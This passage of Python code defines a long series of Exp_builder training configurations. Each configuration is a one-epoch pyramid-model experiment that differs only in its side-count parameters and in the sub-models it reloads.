ch032_1side_7__2side_6__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_5_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_5_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s5__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_5_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_5_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_5_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s5__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_5_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_5_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_5_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s5__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_5_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_5_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_5_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s5__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_5_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_5_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_5_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s5__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_5_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_6_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_6_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s6__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_6_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_6_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_6_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s6__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_6_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_6_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_6_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s6__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_6_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_6_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_6_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s6__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_6_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_6_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_6_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s6__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_6_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_6_4side_6 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_6_4side_6_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s6__4s6") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_6_4side_6, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_5_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_5_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s5__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_5_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_5_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_5_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s5__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_5_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_5_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_5_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s5__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_5_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_5_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_5_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s5__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_5_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_5_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_5_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s5__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_5_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_6_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_6_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s6__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_6_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_6_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_6_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s6__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_6_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_6_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_6_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s6__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_6_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_6_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_6_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s6__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_6_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_6_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_6_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s6__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_6_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_6_4side_6 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_6_4side_6_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s6__4s6") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_6_4side_6, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_7_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_7_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s7__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_7_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_7_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_7_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s7__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_7_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_7_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_7_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s7__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_7_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_7_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_7_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s7__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_7_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
